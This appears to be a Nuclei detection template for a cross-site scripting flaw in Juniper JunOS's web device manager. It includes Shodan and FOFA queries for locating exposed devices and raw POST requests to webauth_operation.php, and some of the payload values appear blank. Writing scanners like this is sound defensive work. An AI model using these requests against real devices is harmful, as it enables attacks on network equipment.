id: junos-xss info: name: JunOS - Cross-Site Scripting author: DhiyaneshDK severity: medium reference: - https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/ classification: cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" fofa-query: title="Juniper Web Device Manager" tags: junos,xss variables: string: "{{to_lower(rand_base(2))}}" http: - raw: - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rs=emit_debug_note&rsargs[]={{string}}&rsargs[]= - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rs=sajax_show_one_stub&rsargs[]={{string}} stop-at-first-match: true matchers-condition: or matchers: - type: word name: emit-debug-note-xss words: - "ERROR: " - "monospace" condition: and - type: word name: sajax-show-one-stub-xss words: - "" - "wrapper for" condition: and # digest: 4a0a0047304502205509ab4fb3ccf422d477ca68806b6ccc107ad2ac2e9ec18d1cd6ece81238dedf022100f5dffd6335836ba306bbf27b9e94bc5f0e13482a3cab49521b1797060bbcf0a1:922c64590222798bb761d5b6d8e72950